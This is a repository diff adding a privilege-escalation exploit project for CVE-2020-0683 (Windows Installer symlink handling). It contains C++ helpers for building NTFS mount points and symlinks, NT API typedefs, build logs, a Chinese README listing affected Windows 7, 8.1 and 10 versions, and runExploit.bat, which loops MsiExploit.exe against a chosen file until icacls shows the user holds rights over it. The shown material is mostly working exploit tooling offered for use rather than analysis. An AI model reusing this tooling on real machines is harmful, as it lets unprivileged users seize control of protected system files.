
421
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/ReparsePoint.cpp Normal file
View File

@ -0,0 +1,421 @@
// Copyright 2015 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http ://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include "stdafx.h"
#include "ReparsePoint.h"
#include "ScopedHandle.h"
#include "typed_buffer.h"
#include <string>
#include <vector>
// Taken from ntifs.h
#define SYMLINK_FLAG_RELATIVE 1
#define FILE_READ_DATA 1
#define FILE_LIST_DIRECTORY 1
typedef struct _REPARSE_DATA_BUFFER {
ULONG ReparseTag;
USHORT ReparseDataLength;
USHORT Reserved;
union {
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
ULONG Flags;
WCHAR PathBuffer[1];
} SymbolicLinkReparseBuffer;
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
WCHAR PathBuffer[1];
} MountPointReparseBuffer;
struct {
UCHAR DataBuffer[1];
} GenericReparseBuffer;
} DUMMYUNIONNAME;
} REPARSE_DATA_BUFFER, *PREPARSE_DATA_BUFFER;
#define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer)
#define IO_REPARSE_TAG_MOUNT_POINT (0xA0000003L) // winnt
#define IO_REPARSE_TAG_HSM (0xC0000004L) // winnt
#define IO_REPARSE_TAG_DRIVE_EXTENDER (0x80000005L)
#define IO_REPARSE_TAG_HSM2 (0x80000006L) // winnt
#define IO_REPARSE_TAG_SIS (0x80000007L) // winnt
#define IO_REPARSE_TAG_WIM (0x80000008L) // winnt
#define IO_REPARSE_TAG_CSV (0x80000009L) // winnt
#define IO_REPARSE_TAG_DFS (0x8000000AL) // winnt
#define IO_REPARSE_TAG_FILTER_MANAGER (0x8000000BL)
#define IO_REPARSE_TAG_SYMLINK (0xA000000CL) // winnt
#define IO_REPARSE_TAG_IIS_CACHE (0xA0000010L)
#define IO_REPARSE_TAG_DFSR (0x80000012L) // winnt
#define IO_REPARSE_TAG_DEDUP (0x80000013L) // winnt
#define IO_REPARSE_TAG_APPXSTRM (0xC0000014L)
#define IO_REPARSE_TAG_NFS (0x80000014L) // winnt
#define IO_REPARSE_TAG_FILE_PLACEHOLDER (0x80000015L) // winnt
#define IO_REPARSE_TAG_DFM (0x80000016L)
#define IO_REPARSE_TAG_WOF (0x80000017L) // winnt
static int g_last_error = 0;
int ReparsePoint::GetLastError()
{
return g_last_error;
}
ScopedHandle OpenReparsePoint(const std::wstring& path, bool writable)
{
HANDLE h = CreateFile(path.c_str(),
GENERIC_READ | (writable ? GENERIC_WRITE : 0),
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, //0, //
0,
OPEN_EXISTING,
FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, // FILE_ATTRIBUTE_DIRECTORY
0);
if (h == INVALID_HANDLE_VALUE)
{
g_last_error = GetLastError();
}
return ScopedHandle(h, false);
}
static bool SetReparsePoint(const ScopedHandle& handle, typed_buffer_ptr<REPARSE_DATA_BUFFER>& reparse_buffer)
{
DWORD cb;
if (!handle.IsValid()) {
return false;
}
bool ret = DeviceIoControl(handle, FSCTL_SET_REPARSE_POINT,
reparse_buffer, reparse_buffer.size(), nullptr, 0, &cb, nullptr) == TRUE;
if (!ret)
{
g_last_error = GetLastError();
}
return ret;
}
static bool DeleteReparsePoint(const ScopedHandle& handle, PREPARSE_GUID_DATA_BUFFER reparse_buffer)
{
DWORD cb;
if (!handle.IsValid()) {
return false;
}
bool ret = DeviceIoControl(handle,
FSCTL_DELETE_REPARSE_POINT,
reparse_buffer,
REPARSE_GUID_DATA_BUFFER_HEADER_SIZE,
nullptr,
0,
&cb,
0) == TRUE;
if (!ret)
{
g_last_error = GetLastError();
}
return ret;
}
typed_buffer_ptr<REPARSE_DATA_BUFFER> BuildMountPoint(const std::wstring& target, const std::wstring& printname)
{
const size_t target_byte_size = target.size() * 2;
const size_t printname_byte_size = printname.size() * 2;
const size_t path_buffer_size = target_byte_size + printname_byte_size + 8 + 4;
const size_t total_size = path_buffer_size + REPARSE_DATA_BUFFER_HEADER_LENGTH;
typed_buffer_ptr<REPARSE_DATA_BUFFER> buffer(total_size);
buffer->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
buffer->ReparseDataLength = static_cast<USHORT>(path_buffer_size);
buffer->Reserved = 0;
buffer->MountPointReparseBuffer.SubstituteNameOffset = 0;
buffer->MountPointReparseBuffer.SubstituteNameLength = static_cast<USHORT>(target_byte_size);
memcpy(buffer->MountPointReparseBuffer.PathBuffer, target.c_str(), target_byte_size + 2);
buffer->MountPointReparseBuffer.PrintNameOffset = static_cast<USHORT>(target_byte_size + 2);
buffer->MountPointReparseBuffer.PrintNameLength = static_cast<USHORT>(printname_byte_size);
memcpy(buffer->MountPointReparseBuffer.PathBuffer + target.size() + 1, printname.c_str(), printname_byte_size + 2);
return buffer;
}
typed_buffer_ptr<REPARSE_DATA_BUFFER> BuildSymlink(const std::wstring& target, const std::wstring& printname, bool relative)
{
const size_t target_byte_size = target.size() * 2;
const size_t printname_byte_size = printname.size() * 2;
const size_t path_buffer_size = target_byte_size + printname_byte_size + 12 + 4;
const size_t total_size = path_buffer_size + REPARSE_DATA_BUFFER_HEADER_LENGTH;
typed_buffer_ptr<REPARSE_DATA_BUFFER> buffer(total_size);
buffer->ReparseTag = IO_REPARSE_TAG_SYMLINK;
buffer->ReparseDataLength = static_cast<USHORT>(path_buffer_size);
buffer->Reserved = 0;
buffer->SymbolicLinkReparseBuffer.SubstituteNameOffset = 0;
buffer->SymbolicLinkReparseBuffer.SubstituteNameLength = static_cast<USHORT>(target_byte_size);
memcpy(buffer->SymbolicLinkReparseBuffer.PathBuffer, target.c_str(), target_byte_size + 2);
buffer->SymbolicLinkReparseBuffer.PrintNameOffset = static_cast<USHORT>(target_byte_size + 2);
buffer->SymbolicLinkReparseBuffer.PrintNameLength = static_cast<USHORT>(printname_byte_size);
memcpy(buffer->SymbolicLinkReparseBuffer.PathBuffer + target.size() + 1, printname.c_str(), printname_byte_size + 2);
buffer->SymbolicLinkReparseBuffer.Flags = relative ? SYMLINK_FLAG_RELATIVE : 0;
return buffer;
}
static bool CreateMountPointInternal(const std::wstring& path, typed_buffer_ptr<REPARSE_DATA_BUFFER>& buffer)
{
ScopedHandle handle = OpenReparsePoint(path, true);
//ScopedHandle handle = OpenReparsePoint(path, false);
if (!handle.IsValid())
{
return false;
}
return SetReparsePoint(handle, buffer);
}
static bool CreateMountPointInternal(const ScopedHandle& handle, typed_buffer_ptr<REPARSE_DATA_BUFFER>& buffer)
{
return SetReparsePoint(handle, buffer);
}
std::wstring FixupPath(std::wstring str)
{
if (str[0] != '\\')
{
return L"\\??\\" + str;
}
return str;
}
bool ReparsePoint::CreateMountPoint(const std::wstring& path, const std::wstring& target, const std::wstring& printname)
{
if (target.length() == 0)
{
return false;
}
return CreateMountPointInternal(path, BuildMountPoint(FixupPath(target), printname));
}
bool ReparsePoint::CreateSymlink(const std::wstring& path, const std::wstring& target, const std::wstring& printname, bool relative)
{
if (target.length() == 0)
{
return false;
}
return CreateMountPointInternal(path, BuildSymlink(!relative ? FixupPath(target) : target, printname, relative));
}
bool ReparsePoint::CreateSymlink(HANDLE h, const std::wstring& target, const std::wstring& printname, bool relative)
{
ScopedHandle handle(h, true);
if (!handle.IsValid())
{
return false;
}
return CreateMountPointInternal(handle, BuildSymlink(!relative ? FixupPath(target) : target, printname, relative));
}
bool ReparsePoint::DeleteMountPoint(const std::wstring& path)
{
REPARSE_GUID_DATA_BUFFER reparse_buffer = { 0 };
reparse_buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
ScopedHandle handle = OpenReparsePoint(path, true);
return DeleteReparsePoint(handle, &reparse_buffer);
}
bool ReparsePoint::CreateRawMountPoint(const std::wstring& path, DWORD reparse_tag, const std::vector<BYTE>& buffer)
{
typed_buffer_ptr<REPARSE_DATA_BUFFER> reparse_buffer(8 + buffer.size());
reparse_buffer->ReparseTag = reparse_tag;
reparse_buffer->ReparseDataLength = static_cast<USHORT>(buffer.size());
reparse_buffer->Reserved = 0;
memcpy(reparse_buffer->GenericReparseBuffer.DataBuffer, &buffer[0], buffer.size());
return CreateMountPointInternal(path, reparse_buffer);
}
static typed_buffer_ptr<REPARSE_DATA_BUFFER> GetReparsePointData(ScopedHandle handle)
{
typed_buffer_ptr<REPARSE_DATA_BUFFER> buf(MAXIMUM_REPARSE_DATA_BUFFER_SIZE);
DWORD dwBytesReturned;
if (!DeviceIoControl(handle,
FSCTL_GET_REPARSE_POINT,
NULL,
0,
(LPVOID)buf,
buf.size(),
&dwBytesReturned,
0)
)
{
g_last_error = GetLastError();
buf.reset(0);
}
return buf;
}
std::wstring ReparsePoint::GetMountPointTarget(const std::wstring& path)
{
ScopedHandle handle = OpenReparsePoint(path, false);
if (!handle.IsValid())
{
return L"";
}
typed_buffer_ptr<REPARSE_DATA_BUFFER> buf = GetReparsePointData(handle);
if (buf.size() == 0)
{
return L"";
}
if (buf->ReparseTag != IO_REPARSE_TAG_MOUNT_POINT)
{
g_last_error = ERROR_REPARSE_TAG_MISMATCH;
return L"";
}
WCHAR* base = &buf->MountPointReparseBuffer.PathBuffer[buf->MountPointReparseBuffer.SubstituteNameOffset / 2];
return std::wstring(base, base + (buf->MountPointReparseBuffer.SubstituteNameLength / 2));
}
bool ReparsePoint::IsReparsePoint(const std::wstring& path)
{
ScopedHandle handle = OpenReparsePoint(path, false);
BY_HANDLE_FILE_INFORMATION file_info = { 0 };
return handle.IsValid() && GetFileInformationByHandle(handle, &file_info) && file_info.dwFileAttributes & FILE_ATTRIBUTE_REPARSE_POINT;
}
static bool ReadReparsePoint(const std::wstring& path, typed_buffer_ptr<REPARSE_DATA_BUFFER>& reparse_buffer)
{
ScopedHandle handle = OpenReparsePoint(path, false);
reparse_buffer.reset(4096);
DWORD dwSize;
bool ret = DeviceIoControl(handle, FSCTL_GET_REPARSE_POINT, nullptr, 0, reparse_buffer, reparse_buffer.size(), &dwSize, nullptr) == TRUE;
if (!ret)
{
g_last_error = GetLastError();
return false;
}
else
{
reparse_buffer.resize(dwSize);
return true;
}
}
static bool IsReparseTag(const std::wstring& path, DWORD reparse_tag)
{
typed_buffer_ptr<REPARSE_DATA_BUFFER> buffer;
if (ReadReparsePoint(path, buffer))
{
return buffer->ReparseTag == reparse_tag;
}
else
{
return false;
}
}
bool ReparsePoint::IsMountPoint(const std::wstring& path)
{
return IsReparseTag(path, IO_REPARSE_TAG_MOUNT_POINT);
}
bool ReparsePoint::IsSymlink(const std::wstring& path)
{
return IsReparseTag(path, IO_REPARSE_TAG_SYMLINK);
}
bool ReparsePoint::ReadMountPoint(const std::wstring& path, std::wstring& target, std::wstring& printname)
{
typed_buffer_ptr<REPARSE_DATA_BUFFER> buffer;
if (ReadReparsePoint(path, buffer) && buffer->ReparseTag == IO_REPARSE_TAG_MOUNT_POINT)
{
WCHAR* target_name = &buffer->MountPointReparseBuffer.PathBuffer[buffer->MountPointReparseBuffer.SubstituteNameOffset / 2];
WCHAR* display_name = &buffer->MountPointReparseBuffer.PathBuffer[buffer->MountPointReparseBuffer.PrintNameOffset / 2];
target.assign(target_name, target_name + buffer->MountPointReparseBuffer.SubstituteNameLength / 2);
printname.assign(display_name, display_name + buffer->MountPointReparseBuffer.PrintNameLength / 2);
return true;
}
else
{
return false;
}
}
bool ReparsePoint::ReadSymlink(const std::wstring& path, std::wstring& target, std::wstring& printname, unsigned int* flags)
{
typed_buffer_ptr<REPARSE_DATA_BUFFER> buffer;
if (ReadReparsePoint(path, buffer) && buffer->ReparseTag == IO_REPARSE_TAG_SYMLINK)
{
WCHAR* target_name = &buffer->SymbolicLinkReparseBuffer.PathBuffer[buffer->SymbolicLinkReparseBuffer.SubstituteNameOffset / 2];
WCHAR* display_name = &buffer->SymbolicLinkReparseBuffer.PathBuffer[buffer->SymbolicLinkReparseBuffer.PrintNameOffset / 2];
target.assign(target_name, target_name + buffer->SymbolicLinkReparseBuffer.SubstituteNameLength / 2);
printname.assign(display_name, display_name + buffer->SymbolicLinkReparseBuffer.PrintNameLength / 2);
*flags = buffer->SymbolicLinkReparseBuffer.Flags;
return true;
}
else
{
return false;
}
}
bool ReparsePoint::ReadRaw(const std::wstring& path, unsigned int* reparse_tag, std::vector<BYTE>& raw_data)
{
typed_buffer_ptr<REPARSE_DATA_BUFFER> buffer;
if (ReadReparsePoint(path, buffer))
{
*reparse_tag = buffer->ReparseTag;
raw_data.resize(buffer->ReparseDataLength);
memcpy(&raw_data[0], buffer->GenericReparseBuffer.DataBuffer, buffer->ReparseDataLength);
return true;
}
else
{
return false;
}
return false;
}

25
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/ReparsePoint.h Normal file
View File

@ -0,0 +1,25 @@
#pragma once
#include <string>
#include <vector>
class ReparsePoint
{
public:
static bool CreateMountPoint(const std::wstring& path, const std::wstring& target, const std::wstring& printname);
static bool DeleteMountPoint(const std::wstring& path);
static std::wstring GetMountPointTarget(const std::wstring& path);
static bool CreateRawMountPoint(const std::wstring& path, DWORD reparse_tag, const std::vector<BYTE>& buffer);
static bool IsMountPoint(const std::wstring& path);
static bool IsSymlink(const std::wstring& path);
static bool ReadMountPoint(const std::wstring& path, std::wstring& target, std::wstring& printname);
static bool ReadSymlink(const std::wstring& path, std::wstring& target, std::wstring& printname, unsigned int* flags);
static bool ReadRaw(const std::wstring& path, unsigned int* reparse_tag, std::vector<BYTE>& raw_data);
static bool IsReparsePoint(const std::wstring& path);
static bool CreateSymlink(const std::wstring& path, const std::wstring& target, const std::wstring& printname, bool relative);
static bool CreateSymlink(HANDLE h, const std::wstring& target, const std::wstring& printname, bool relative);
static int GetLastError();
};

94
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/ScopedHandle.cpp Normal file
View File

@ -0,0 +1,94 @@
// Copyright 2015 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http ://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include "stdafx.h"
#include "ScopedHandle.h"
static HANDLE Duplicate(HANDLE h)
{
HANDLE dup;
if ((h == INVALID_HANDLE_VALUE) || !DuplicateHandle(GetCurrentProcess(), h, GetCurrentProcess(), &dup, 0, FALSE, DUPLICATE_SAME_ACCESS))
{
return nullptr;
}
else
{
return dup;
}
}
ScopedHandle::ScopedHandle(HANDLE h, bool duplicate)
{
if (duplicate)
{
g_h = Duplicate(h);
}
else
{
g_h = h;
}
}
ScopedHandle::ScopedHandle(const ScopedHandle& other)
{
g_h = Duplicate(other.g_h);
}
ScopedHandle& ScopedHandle::operator=(const ScopedHandle& other)
{
if (this != &other)
{
g_h = Duplicate(other.g_h);
}
return *this;
}
ScopedHandle::ScopedHandle(ScopedHandle&& other)
{
g_h = other.g_h;
other.g_h = nullptr;
}
ScopedHandle& ScopedHandle::operator=(ScopedHandle&& other)
{
if (this != &other)
{
g_h = other.g_h;
other.g_h = nullptr;
}
return *this;
}
void ScopedHandle::Close()
{
if (IsValid())
{
CloseHandle(g_h);
g_h = nullptr;
}
}
void ScopedHandle::Reset(HANDLE h)
{
Close();
g_h = h;
}
ScopedHandle::~ScopedHandle()
{
Close();
}

25
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/ScopedHandle.h Normal file
View File

@ -0,0 +1,25 @@
#pragma once
class ScopedHandle
{
HANDLE g_h;
public:
ScopedHandle(HANDLE h, bool duplicate);
void Close();
void Reset(HANDLE h);
bool IsValid() const {
return (g_h != nullptr) && (g_h != INVALID_HANDLE_VALUE);
}
ScopedHandle(const ScopedHandle& other);
ScopedHandle& operator=(const ScopedHandle& other);
ScopedHandle(ScopedHandle&& other);
ScopedHandle& operator=(ScopedHandle&& other);
operator HANDLE() const {
return g_h;
}
~ScopedHandle();
};

BIN
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/foo.msi Normal file
View File

Binary file not shown.

69
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/ntimports.h Normal file
View File

@ -0,0 +1,69 @@
#pragma once
#include <Windows.h>
#include <winternl.h>
#define DIRECTORY_QUERY 0x0001
#define DIRECTORY_TRAVERSE 0x0002
#define DIRECTORY_CREATE_OBJECT 0x0004
#define DIRECTORY_CREATE_SUBDIRECTORY 0x0008
#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF)
typedef NTSTATUS(NTAPI *_NtCreateDirectoryObject)(PHANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
typedef NTSTATUS(NTAPI *_NtCreateDirectoryObjectEx)(PHANDLE Handle, ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ShadowDir, BOOLEAN Something);
typedef NTSTATUS(NTAPI *_NtOpenDirectoryObject)(PHANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
typedef VOID(NTAPI *_RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)
typedef NTSTATUS(NTAPI* _NtCreateSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING TargetName);
typedef NTSTATUS(NTAPI* _NtOpenSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
typedef NTSTATUS(NTAPI* _NtQuerySymbolicLinkObject)(HANDLE LinkHandle, PUNICODE_STRING LinkTarget, PULONG ReturnedLength);
typedef NTSTATUS(NTAPI* _NtOpenFile)(
_Out_ PHANDLE FileHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ ULONG ShareAccess,
_In_ ULONG OpenOptions
);
const ULONG FileLinkInformation = 11;
const ULONG FileLinkInformationBypassAccessCheck = 57;
const ULONG FileLinkInformationEx = 72;
const ULONG FileLinkInformationExBypassAccessCheck = 73;
const ULONG FileDispositionInformationEx = 64;
typedef struct _FILE_LINK_INFORMATION {
BOOLEAN ReplaceIfExists;
HANDLE RootDirectory;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION;
typedef struct _FILE_LINK_INFORMATION_EX {
union {
BOOLEAN ReplaceIfExists;
ULONG Flags;
};
HANDLE RootDirectory;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_LINK_INFORMATION_EX, *PFILE_LINK_INFORMATION_EX;
typedef struct _FILE_DISPOSITION_INFORMATION_EX {
ULONG Flags;
} FILE_DISPOSITION_INFORMATION_EX, *PFILE_DISPOSITION_INFORMATION_EX;
typedef NTSTATUS(__stdcall *_ZwSetInformationFile)(
_In_ HANDLE FileHandle,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ PVOID FileInformation,
_In_ ULONG Length,
_In_ ULONG FileInformationClass
);
typedef ULONG(NTAPI* _RtlNtStatusToDosError)(NTSTATUS status);
void SetNtLastError(NTSTATUS status);
#define DEFINE_NTDLL(x) _ ## x f ## x = (_ ## x)GetProcAddressNT(#x)

4
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/readfile.user Normal file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>

27
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/runExploit.bat Normal file
View File

@ -0,0 +1,27 @@
@echo OFF
IF %1.==. GOTO No1
set fileName=%1
REM PowerShell -Command "&{ $cmdOutput = icacls %fileName% | findstr "$env:USERDOMAIN" ; Write-Host "cmdOutput is $cmdOutput" ; while ( [string]::IsNullOrEmpty($cmdOutput) ){ .\MsiExploit.exe %fileName% ; $cmdOutput = icacls %fileName% | findstr "$env:USERDOMAIN" ; Write-Host "cmdOutput after is $cmdOutput" } } "
if exist %fileName% (
GOTO Exec
) else (
GOTO No2
)
:Exec
echo ON
PowerShell -Command "&{ $cmdOutput = icacls %fileName% | findstr "$env:USERDOMAIN" ; while ( [string]::IsNullOrEmpty($cmdOutput) ){ .\MsiExploit.exe %fileName% ; $cmdOutput = icacls %fileName% | findstr "$env:USERDOMAIN" } } "
@GOTO End
:No1
@ECHO Missing file as parameter
@GOTO End
:No2
@ECHO file doesn't exist
@GOTO End
:End

8
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/stdafx.cpp Normal file
View File

@ -0,0 +1,8 @@
// stdafx.cpp : source file that includes just the standard includes
// $safeprojectname$.pch will be the pre-compiled header
// stdafx.obj will contain the pre-compiled type information
#include "stdafx.h"
// TODO: reference any additional headers you need in STDAFX.H
// and not in this file

17
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/stdafx.h Normal file
View File

@ -0,0 +1,17 @@
// stdafx.h : include file for standard system include files,
// or project specific include files that are used frequently, but
// are changed infrequently
//
#pragma once
#include "targetver.h"
#define RPC_USE_NATIVE_WCHAR
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <memory>
FARPROC GetProcAddressNT(LPCSTR lpName);

8
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/targetver.h Normal file
View File

@ -0,0 +1,8 @@
#pragma once
// Including SDKDDKVer.h defines the highest available Windows platform.
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
#include <SDKDDKVer.h>

70
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/typed_buffer.h Normal file
View File

@ -0,0 +1,70 @@
#pragma once
#include <memory>
#include <algorithm>
template<class T>
class typed_buffer_ptr {
std::unique_ptr<char[]> buffer_;
size_t size_;
public:
typed_buffer_ptr() {
}
explicit typed_buffer_ptr(size_t size) {
reset(size);
}
void reset(size_t size) {
buffer_.reset(new char[size]);
memset(buffer_.get(), 0, size);
size_ = size;
}
void resize(size_t size) {
std::unique_ptr<char[]> tmp(new char[size]);
memcpy(tmp.get(), buffer_.get(), min(size, size_));
buffer_ = std::move(tmp);
}
operator T*() {
return reinterpret_cast<T*>(buffer_.get());
}
operator const T*() const {
return cget();
}
T* operator->() const {
return reinterpret_cast<T*>(buffer_.get());
}
const T* cget() const {
return interpret_cast<const T*>(buffer_.get());
}
typed_buffer_ptr(const typed_buffer_ptr<T>& other) = delete;
typed_buffer_ptr& typed_buffer_ptr::operator=(const typed_buffer_ptr<T>& other) = delete;
typed_buffer_ptr(typed_buffer_ptr<T>&& other) {
buffer_ = std::move(other.buffer_);
size_ = other.size_;
other.size_ = 0;
}
typed_buffer_ptr& operator=(typed_buffer_ptr<T>&& other) {
if (this != &other)
{
buffer_ = std::move(other.buffer_);
size_ = other.size_;
other.size_ = 0;
}
}
size_t size() const {
return size_;
}
};

BIN
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/x64/Release/CommonUtils.obj Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/x64/Release/FileOpLock.obj Normal file
View File

Binary file not shown.

20
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/x64/Release/MsiExploit.log Normal file
View File

@ -0,0 +1,20 @@
 stdafx.cpp
CommonUtils.cpp
FileOpLock.cpp
d:\code\kernelhub\cve-2020-0683\cve-2020-0683\msiexploit\fileoplock.cpp(63): warning C4101: “fInfo”: 未引用的局部变量
MsiExploit.cpp
d:\code\kernelhub\cve-2020-0683\cve-2020-0683\msiexploit\msiexploit.cpp(100): warning C4267: “=”: 从“size_t”转换到“ULONG”可能丢失数据
d:\code\kernelhub\cve-2020-0683\cve-2020-0683\msiexploit\msiexploit.cpp(118): warning C4267: “参数”: 从“size_t”转换到“ULONG”可能丢失数据
ReparsePoint.cpp
d:\code\kernelhub\cve-2020-0683\cve-2020-0683\msiexploit\reparsepoint.cpp(25): warning C4005: “FILE_READ_DATA”: 宏重定义
d:\windows kits\10\include\10.0.17763.0\um\winnt.h(12936): note: 参见“FILE_READ_DATA”的前一个定义
d:\code\kernelhub\cve-2020-0683\cve-2020-0683\msiexploit\reparsepoint.cpp(26): warning C4005: “FILE_LIST_DIRECTORY”: 宏重定义
d:\windows kits\10\include\10.0.17763.0\um\winnt.h(12937): note: 参见“FILE_LIST_DIRECTORY”的前一个定义
d:\code\kernelhub\cve-2020-0683\cve-2020-0683\msiexploit\reparsepoint.cpp(108): warning C4267: “参数”: 从“size_t”转换到“DWORD”可能丢失数据
d:\code\kernelhub\cve-2020-0683\cve-2020-0683\msiexploit\reparsepoint.cpp(280): warning C4267: “参数”: 从“size_t”转换到“DWORD”可能丢失数据
d:\code\kernelhub\cve-2020-0683\cve-2020-0683\msiexploit\reparsepoint.cpp(330): warning C4267: “参数”: 从“size_t”转换到“DWORD”可能丢失数据
ScopedHandle.cpp
正在生成代码
All 215 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
已完成代码的生成
MsiExploit.vcxproj -> D:\code\Kernelhub\CVE-2020-0683\CVE-2020-0683\x64\Release\MsiExploit.exe

BIN
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/x64/Release/MsiExploit.obj Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/x64/Release/MsiExploit.pch Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/x64/Release/MsiExploit.tlog/CL.command.1.tlog Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/x64/Release/MsiExploit.tlog/CL.read.1.tlog Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/x64/Release/MsiExploit.tlog/CL.write.1.tlog Normal file
View File

Binary file not shown.

2
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/x64/Release/MsiExploit.tlog/MsiExploit.lastbuildstate Normal file
View File

@ -0,0 +1,2 @@
#TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0
Release|x64|D:\code\Kernelhub\CVE-2020-0683\CVE-2020-0683\|

BIN
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/x64/Release/MsiExploit.tlog/MsiExploit.write.1u.tlog Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/x64/Release/MsiExploit.tlog/link.command.1.tlog Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/x64/Release/MsiExploit.tlog/link.read.1.tlog Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/x64/Release/MsiExploit.tlog/link.write.1.tlog Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/x64/Release/ReparsePoint.obj Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/x64/Release/ScopedHandle.obj Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/x64/Release/stdafx.obj Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/x64/Release/vc141.pdb Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0683/MSI_EoP_New.pdf Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0683/MsiExploit.exe Normal file
View File

Binary file not shown.

53
00-CVE_EXP/CVE-2020-0683/README.md Normal file
View File

@ -0,0 +1,53 @@
## CVE-2020-0683
#### 描述
Windows Installer在MSI包处理符号链接时在Windows Installer中存在权限漏洞的提升
#### 影响版本
| Product | Version | Update | Edition | Tested |
| :------------------ | :------------ | ------ | ------- | ------------------ |
| Windows 7 | X86/x64 | | SP1 | |
| Windows 8.1 | X86/x64 | | | |
| Windows 10 | X86/x64 | | | |
| Windows 10 | X86/x64 | 1607 | | |
| Windows 10 | X86/x64/ARM64 | 1709 | | |
| Windows 10 | X86/x64/ARM64 | 1803 | | |
| Windows 10 | X86/x64/ARM64 | 1809 | | |
| Windows 10 | X86/x64/ARM64 | 1903 | | |
